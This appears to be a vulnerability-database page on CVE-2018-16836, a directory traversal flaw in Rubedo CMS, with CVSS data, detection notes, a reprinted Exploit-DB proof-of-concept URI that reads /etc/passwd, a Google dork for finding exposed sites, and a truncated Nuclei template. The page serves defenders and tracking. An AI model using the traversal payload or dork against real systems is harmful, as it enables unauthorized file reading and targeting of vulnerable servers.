CVE-2018-16836
published 2018-09-11CVE-2018-16836: Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary…
PriorityP187critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
61.44%
99.1th percentile
Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rubedo_project | rubedo | <= 3.4.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd↗
- →Look for URL-encoded dot-dot sequences (%2e%2e) in HTTP GET requests targeting the /theme/default/img/ path, indicative of directory traversal attempts against Rubedo CMS. ↗
- →Exploit requires no authentication (unauthenticated attacker); alert on any unauthenticated GET request to /theme/ paths containing %2e%2e traversal sequences. ↗
- →Successful exploitation returns HTTP 200 with content matching 'root:.*:0:0:' (i.e., /etc/passwd contents); monitor HTTP responses from /theme/ endpoints for Unix passwd file patterns. ↗
- →Google Dork 'intext:rubedo.current.page.description' can be used to identify exposed Rubedo CMS instances for targeted scanning. ↗
- ·The traversal path uses double-slash before /etc/passwd (//etc/passwd) in addition to URL-encoded %2e%2e sequences; detection rules must account for both encoding and the trailing double-slash pattern. ↗
- ·The NVD advisory also shows a mixed encoding variant (%2e%2e/../) suggesting multiple traversal encoding styles may be used; detection should normalize and match both forms. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-g38x-pgq9-cf49: Rubedo through 3
ghsa_unreviewed·2022-05-13
CVE-2018-16836 [CRITICAL] CWE-22 GHSA-g38x-pgq9-cf49: Rubedo through 3
Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.
VulnCheck
rubedo_project rubedo Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2018·CVSS 9.8
CVE-2018-16836 [CRITICAL] rubedo_project rubedo Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
rubedo_project rubedo Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.
Affected: rubedo_project rubedo
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2018-16836
No detection rules found.
Exploit-DB
Rubedo CMS 3.4.0 - Directory Traversal
exploitdb·2018-09-12·CVSS 9.8
CVE-2018-16836 [CRITICAL] Rubedo CMS 3.4.0 - Directory Traversal
Rubedo CMS 3.4.0 - Directory Traversal
---
# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
# Google Dork: intext:rubedo.current.page.description
# Date: 2018-09-11
# Exploit Author: Marouene Boubakri
# Vendor Homepage: https://www.rubedo-project.org
# Version: through 3.4.0
# Tested on: Linux
# CVE : CVE-2018-16836
# PoC:
# Read /etc/passwd file from remote server
/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
Nuclei
Rubedo CMS <=3.4.0 - Directory Traversal
nuclei·CVSS 9.8
CVE-2018-16836 [CRITICAL] Rubedo CMS <=3.4.0 - Directory Traversal
Rubedo CMS =3.4.1) or apply the provided security patch.
reference:
- https://www.exploit-db.com/exploits/45385
- https://nvd.nist.gov/vuln/detail/CVE-2018-16836
- https://github.com/maroueneboubakri/CVE/tree/master/rubedo-cms
- https://www.exploit-db.com/exploits/45385/
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-16836
cwe-id: CWE-22
epss-score: 0.89691
epss-percentile: 0.99565
cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: rubedo_project
product: rubedo
tags: cve2018,cve,rubedo,lfi,edb,rubedo_project,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2
No writeups or analysis indexed.
2018-09-11
Published
Exploited in the wild